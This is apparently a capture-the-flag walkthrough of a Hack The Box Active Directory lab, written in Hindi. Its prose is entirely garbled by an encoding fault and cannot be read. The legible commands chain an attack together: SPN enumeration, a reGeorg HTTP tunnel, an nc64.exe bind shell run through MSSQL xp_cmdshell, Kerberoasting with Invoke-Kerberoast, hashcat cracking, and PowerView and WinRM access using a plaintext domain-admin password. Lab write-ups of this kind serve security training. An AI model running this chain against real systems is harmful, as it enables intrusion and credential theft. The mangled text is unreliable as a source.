Winpeas рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдореЗрдЬрдмрд╛рди рдкрд░ рдЯреЛрд╣реА рдХреЗ рдмрд╛рдж , рд╣рдо рдХреБрдЫ рд╡рд┐рд╢реЗрд╖ рдирд╣реАрдВ рдкрд╛рддреЗ рд╣реИрдВред рдлрд┐рд░ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЗ рд▓рд┐рдП рдлрд┐рд░ рд╕реЗ рджреЗрдЦрдиреЗ рдХрд╛ рдлреИрд╕рд▓рд╛ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ (рдореИрдВрдиреЗ рдЗрд╕ рд╡рд┐рд╖рдп рдкрд░ рдПрдХ рд▓реЗрдЦ рднреА рд▓рд┐рдЦрд╛ рдерд╛ )ред рд▓реЗрдХрд┐рди рдореИрдВрдиреЗ WinRM рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕рд┐рд╕реНрдЯрдо рд╕реЗ рд╕рднреА SPN рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдмрдВрдзрди рдирд╣реАрдВ рдХрд┐рдпрд╛ред

setspn.exe -T intranet.poo -Q */*

рдЫрд╡рд┐

MSSQL рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдЗрд╕ рддрд░рд╣, рд╣рдо рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ SPN рдХреЛ p00_hr рдФрд░ p00_adm рдкреНрд░рд╛рдкреНрдд рдХрд░рддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдХрд╛ рдЕрд░реНрде рд╣реИ рдХрд┐ рд╡реЗ рдХрд░рдмрд░реЛрд╕реНрдЯрд┐рдВрдЧ рдЬреИрд╕реЗ рд╣рдорд▓реЗ рдХреЗ рд▓рд┐рдП рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд╣реИрдВред рд╕рдВрдХреНрд╖реЗрдк рдореЗрдВ, рд╣рдо рдЙрдирдХреЗ рдкрд╛рд╕рд╡рд░реНрдб рдХреА рд╣реИрд╢ рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВред

рд╕рдмрд╕реЗ рдкрд╣рд▓реЗ рдЖрдкрдХреЛ MSSQL рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рдУрд░ рд╕реЗ рдПрдХ рд╕реНрдерд┐рд░ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ рд╣реЛрдЧрд╛ред рд▓реЗрдХрд┐рди рдЬрдм рд╕реЗ рд╣рдо рдкрд╣реБрдВрдЪ рдореЗрдВ рд╕реАрдорд┐рдд рд╣реИрдВ, рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдХреЗрд╡рд▓ 80 рдФрд░ 1433 рдкреЛрд░реНрдЯ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╣реЛрд╕реНрдЯ рддрдХ рдкрд╣реБрдВрдЪ рд╣реИред рд▓реЗрдХрд┐рди рдкреЛрд░реНрдЯ 80 рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕реБрд░рдВрдЧ рдпрд╛рддрд╛рдпрд╛рдд рдХреЛ рд╕рдВрднрд╡ рд╣реИ! рдРрд╕рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдо рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ ред рд╡реЗрдм рд╕рд░реНрд╡рд░ рдХреА рд╣реЛрдо рдбрд╛рдпрд░реЗрдХреНрдЯрд░реА - C: \ inetpub \ wwwroot \ рдкрд░ рд╕реБрд░рдВрдЧ.рд╕реНрдкрдХреНрд╕ рдлрд╝рд╛рдЗрд▓ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдВред

рдЫрд╡рд┐

рд▓реЗрдХрд┐рди рдЬрдм рд╣рдо рдЗрд╕реЗ рдПрдХреНрд╕реЗрд╕ рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рд╣рдореЗрдВ 404 рддреНрд░реБрдЯрд┐ рдорд┐рд▓рддреА рд╣реИред рдЗрд╕рдХрд╛ рдорддрд▓рдм рд╣реИ рдХрд┐ * .aspx рдлрд╛рдЗрд▓реЗрдВ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдирд╣реАрдВ рд╣реЛрддреА рд╣реИрдВред рдХреНрд░рд┐рдпрд╛рдиреНрд╡рдпрди рд╢реБрд░реВ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЗрди рдПрдХреНрд╕рдЯреЗрдВрд╢рди рд╡рд╛рд▓реА рдлрд╛рдЗрд▓реЛрдВ рдХреЗ рд▓рд┐рдП, ASP.NET 4.5 рдЗрд╕ рдкреНрд░рдХрд╛рд░ рд╕реНрдерд╛рдкрд┐рдд рдХрд░реЗрдВред

dism /online /enable-feature /all /featurename:IIS-ASPNET45

рдЫрд╡рд┐

рдЫрд╡рд┐

рдФрд░ рдЕрдм рдЬрдм рд╕реБрд░рдВрдЧ рддрдХ рдкрд╣реБрдБрдЪрдиреЗ рдореЗрдВред рд╣рдореЗрдВ рдЬрд╡рд╛рдм рдорд┐рд▓рддрд╛ рд╣реИ рдХрд┐ рд╕рдм рдХреБрдЫ рдХрд╛рдо рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рддреИрдпрд╛рд░ рд╣реИред

рдЫрд╡рд┐

рдЖрдЗрдП рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдХреЗ рдХреНрд▓рд╛рдЗрдВрдЯ рднрд╛рдЧ рдХреЛ рд▓реЙрдиреНрдЪ рдХрд░реЗрдВ, рдЬреЛ рдЯреНрд░реИрдлрд╝рд┐рдХ рд░рд┐рд▓реЗрдЗрдВрдЧ рд╕реЗ рдирд┐рдкрдЯреЗрдЧрд╛ред рд╣рдо рдкреЛрд░реНрдЯ 5432 рд╕реЗ рд╕рднреА рдЯреНрд░реИрдлрд╝рд┐рдХ рдХреЛ рд╕рд░реНрд╡рд░ рдкрд░ рд░реАрдбрд╛рдпрд░реЗрдХреНрдЯ рдХрд░реЗрдВрдЧреЗред

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

рдЫрд╡рд┐

рдФрд░ рд╣рдо рдЕрдкрдиреЗ рдкреНрд░реЙрдХреНрд╕реА рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрд┐рд╕реА рднреА рдПрдкреНрд▓рд┐рдХреЗрд╢рди рдХреЛ рдЯреНрд░реИрдлрд╝рд┐рдХ рднреЗрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рдкреНрд░реЙрдХреНрд╕рд╛рдЗрд╣рд╛рдВрд╕ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдлрд╝рд╛рдЗрд▓ /etc/proxychains.conf рдкрд░ рдЗрд╕ рдкреНрд░реЙрдХреНрд╕реА рдХреЛ рдЬреЛрдбрд╝реЗрдВред

рдЫрд╡рд┐

рдЕрдм рд╣рдо рдиреЗрдЯрдХреИрдЯ рдкреНрд░реЛрдЧреНрд░рд╛рдо рдХреЛ рд╕рд░реНрд╡рд░ рдкрд░ рдЕрдкрд▓реЛрдб рдХрд░реЗрдВрдЧреЗ , рдЬрд┐рд╕рдХреА рдорджрдж рд╕реЗ рд╣рдо рдПрдХ рд╕реНрдерд┐рд░ рдмрд╛рдЗрдВрдб рд╢реЗрд▓, рдФрд░ рдЗрдирд╡реЛрдХ-рдХреЗрд░реНрдмреЛрд╕реНрдЯ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдмрдирд╛рдПрдВрдЧреЗ , рдЬрд┐рд╕рдХреЗ рд╕рд╛рде рд╣рдо рдХрд░рдмрд░реЛрд╕реНрдЯрд┐рдВрдЧ рдЕрдЯреИрдХ рдХрд░реЗрдВрдЧреЗред

рдЫрд╡рд┐

рдЕрдм MSSQL рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╣рдо рд╢реНрд░реЛрддрд╛ рдХреЛ рд╢реБрд░реВ рдХрд░рддреЗ рд╣реИрдВред

xp_cmdshell C:\temp\nc64.exe -e powershell.exe -lvp 4321

рдЫрд╡рд┐

рдФрд░ рд╣рдорд╛рд░реЗ рдкреНрд░реЙрдХреНрд╕реА рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░реЗрдВред

proxychains rlwrap nc poo.htb 4321

рдЫрд╡рд┐

рдФрд░ рдЪрд▓реЛ рд╣реИрд╢ рдХреЛ рдкреНрд░рд╛рдкреНрдд рдХрд░рддреЗ рд╣реИрдВред

. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:\temp\kerb_hashes.txt' -Width 8000
type kerb_hashes.txt

рдЫрд╡рд┐

рдЕрдЧрд▓рд╛ рдЖрдкрдХреЛ рдЗрди рд╣реИрд╢ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╕реЙрд░реНрдЯ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рдЪреВрдВрдХрд┐ рд░реЙрдХрдпреМ рд╢рдмреНрджрдХреЛрд╢ рдореЗрдВ рдХреЛрдИ рдкрд╛рд╕рд╡рд░реНрдб рдбреЗрдЯрд╛ рдирд╣реАрдВ рдерд╛, рдЗрд╕рд▓рд┐рдП рдореИрдВрдиреЗ Seclists рджреНрд╡рд╛рд░рд╛ рдкреНрд░рджрд╛рди рдХрд┐рдП рдЧрдП рд╕рднреА рдкрд╛рд╕рд╡рд░реНрдб рд╢рдмреНрджрдХреЛрд╢реЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ред рдЦреЛрдЬ рдХреЗ рд▓рд┐рдП рд╣рдо рд╣реИрд╢рдЯреИрдХ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

рдФрд░ рд╣рдо рджреЛрдиреЛрдВ рдкрд╛рд╕рд╡рд░реНрдб рдкрд╛рддреЗ рд╣реИрдВ, рдкрд╣рд▓рд╛ рд╢рдмреНрджрдХреЛрд╢ Dutch_passwordlist.txt рдореЗрдВ рдФрд░ рджреВрд╕рд░рд╛ рдХреАрдмреЛрд░реНрдб-рдХреЙрдореНрдмреАрдиреЗрд╢рди.рдЯреЗрдХреНрд╕реНрдЯ рдореЗрдВред

рдЫрд╡рд┐

рдЫрд╡рд┐

рдФрд░ рдЗрд╕рд▓рд┐рдП рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рддреАрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╣реИрдВ, рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдкрд░ рдЬрд╛рдПрдВред рдкрд╣рд▓реЗ рд╣рдо рдЙрд╕рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛ рд▓реЗрддреЗ рд╣реИрдВред

рдЫрд╡рд┐

рдареАрдХ рд╣реИ, рд╣рдореЗрдВ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдХрд╛ рдЖрдИрдкреА рдкрддрд╛ рдорд┐рд▓рд╛ред рдЖрдЗрдП рдбреЛрдореЗрди рдХреЗ рд╕рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЛ рдкрддрд╛ рдХрд░реЗрдВ, рд╕рд╛рде рд╣реА рдЙрдирдореЗрдВ рд╕реЗ рдХреМрди рдкреНрд░рд╢рд╛рд╕рдХ рд╣реИред рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП PowerView.ps1ред рдлрд┐рд░ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ -s рдкреИрд░рд╛рдореАрдЯрд░ рдореЗрдВ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХреЗ рд╕рд╛рде рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░рдХреЗ рдмреБрд░рд╛рдИ-рд╡рд╛рдЗрдирдореЗрдпрд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВред рдФрд░ рдлрд┐рд░ PowerView рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд▓реЛрдб рдХрд░реЗрдВред

рдЫрд╡рд┐

рдЕрдм рдЗрд╕рдХреЗ рд╕рднреА рдХрд╛рд░реНрдп рд╣рдорд╛рд░реЗ рд▓рд┐рдП рдЙрдкрд▓рдмреНрдз рд╣реИрдВред рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ p00_adm рдПрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреА рддрд░рд╣ рджрд┐рдЦрддрд╛ рд╣реИ, рдЗрд╕рд▓рд┐рдП рд╣рдо рдЙрд╕рдХреЗ рд╕рдВрджрд░реНрдн рдореЗрдВ рдХрд╛рдо рдХрд░реЗрдВрдЧреЗред рдЗрд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд▓рд┐рдП рдПрдХ PSCredential рдСрдмреНрдЬреЗрдХреНрдЯ рдмрдирд╛рдПрдБред

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

рдЕрдм рд╕рднреА Powershell рдХрдорд╛рдВрдб, рдЬрд╣рд╛рдВ рд╣рдо рдХреНрд░реЗрдбрд┐рдЯ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░рддреЗ рд╣реИрдВ, p00_adm рдХреА рдУрд░ рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред рдЪрд▓реЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдФрд░ AdminCount рд╡рд┐рд╢реЗрд╖рддрд╛ рдХреЛ рд╕реВрдЪреАрдмрджреНрдз рдХрд░рддреЗ рд╣реИрдВред

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

рдЫрд╡рд┐

рдФрд░ рдЗрд╕рд▓рд┐рдП, рд╣рдорд╛рд░рд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдкреНрд░рд╛рдкреНрдд рд╣реИред рдЖрдЗрдП рдЙрди рд╕рдореВрд╣реЛрдВ рдкрд░ рдПрдХ рдирдЬрд╝рд░ рдбрд╛рд▓реЗрдВ рдЬрд┐рдирдореЗрдВ рдпрд╣ рдмрдирд╛ рд╣реИред

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

рдЫрд╡рд┐

рд╣рдо рдкреБрд╖реНрдЯрд┐ рдХрд░рддреЗ рд╣реИрдВ рдХрд┐ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдПрдХ рдбреЛрдореЗрди рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╣реИред рдпрд╣ рдЙрд╕реЗ рдбреЛрдореЗрди рдирд┐рдпрдВрддреНрд░рдХ рдХреЛ рджреВрд░рд╕реНрде рд▓реЙрдЧрд┐рди рдХрд╛ рдЕрдзрд┐рдХрд╛рд░ рджреЗрддрд╛ рд╣реИред рдЖрдЗрдП рд╣рдорд╛рд░реА рд╕реБрд░рдВрдЧ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ WinRM рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рдкреНрд░рд╡реЗрд╢ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВред рдореИрдВ рдмреБрд░рд╛рдИ-рдЬреАрдд рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╕рдордп reGeorg рджреНрд╡рд╛рд░рд╛ рдЙрддреНрдкрдиреНрди рддреНрд░реБрдЯрд┐рдпреЛрдВ рд╕реЗ рднреНрд░рдорд┐рдд рдерд╛ред

рдЫрд╡рд┐

рдлрд┐рд░ рд╣рдо WinRM рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдФрд░, рдЖрд╕рд╛рди, рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВрдЧреЗред рдХрдиреЗрдХреНрд╢рди рдХреЗ рд▓рд┐рдП рдорд╛рдкрджрдВрдбреЛрдВ рдХреЛ рдЦреЛрд▓реЗрдВ рдФрд░ рдмрджрд▓реЗрдВред

рдЫрд╡рд┐

рд╣рдо рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░ рд░рд╣реЗ рд╣реИрдВ, рдФрд░ рд╣рдо рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рд╣реИрдВред

рдЫрд╡рд┐

рд▓реЗрдХрд┐рди рдХреЛрдИ рдЭрдВрдбрд╛ рдирд╣реАрдВ рд╣реИред рдлрд┐рд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рджреЗрдЦреЗрдВ рдФрд░ рдбреЗрд╕реНрдХрдЯреЙрдк рдХреА рдЬрд╛рдВрдЪ рдХрд░реЗрдВред

рдЫрд╡рд┐

Mr3ks рдкрд░ рд╣рдо рдЭрдВрдбрд╛ рдвреВрдВрдврддреЗ рд╣реИрдВ рдФрд░ рдкреНрд░рдпреЛрдЧрд╢рд╛рд▓рд╛ 100% рдЙрддреНрддреАрд░реНрдг рд╣реИред

рдЫрд╡рд┐

рдмрд╕ рдЗрддрдирд╛ рд╣реАред рдПрдХ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдХреЗ рд░реВрдк рдореЗрдВ, рдЯрд┐рдкреНрдкрдгреА рдХрд░реЗрдВ рдХрд┐ рдХреНрдпрд╛ рдЖрдкрдиреЗ рдЗрд╕ рд▓реЗрдЦ рд╕реЗ рдХреБрдЫ рдирдпрд╛ рд╕реАрдЦрд╛ рд╣реИ рдФрд░ рдХреНрдпрд╛ рдпрд╣ рдЖрдкрдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧреА рд╣реИред

рдЖрдк рд╣рдорд╕реЗ рдЯреЗрд▓реАрдЧреНрд░рд╛рдо рдкрд░ рдЬреБрдбрд╝ рд╕рдХрддреЗ рд╣реИрдВред рд╡рд╣рд╛рдВ рдЖрдк рджрд┐рд▓рдЪрд╕реНрдк рд╕рд╛рдордЧреНрд░реА, рдорд░реНрдЬ рдХрд┐рдП рдЧрдП рдкрд╛рдареНрдпрдХреНрд░рдо, рд╕рд╛рде рд╣реА рд╕реЙрдлрд╝реНрдЯрд╡реЗрдпрд░ рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВред рдЖрдЗрдП рдПрдХ рд╕рдореБрджрд╛рдп рдХреЛ рдПрдХ рд╕рд╛рде рд░рдЦреЗрдВ рдЬрд┐рд╕рдореЗрдВ рдРрд╕реЗ рд▓реЛрдЧ рд╣реЛрдВрдЧреЗ рдЬреЛ рдЖрдИрдЯреА рдХреЗ рдХрдИ рдХреНрд╖реЗрддреНрд░реЛрдВ рдореЗрдВ рдкрд╛рд░рдВрдЧрдд рд╣реИрдВ, рдлрд┐рд░ рд╣рдо рд╣рдореЗрд╢рд╛ рдХрд┐рд╕реА рднреА рдЖрдИрдЯреА рдФрд░ рд╕реВрдЪрдирд╛ рд╕реБрд░рдХреНрд╖рд╛ рдореБрджреНрджреЛрдВ рдкрд░ рдПрдХ рджреВрд╕рд░реЗ рдХреА рдорджрдж рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

More articles:


All Articles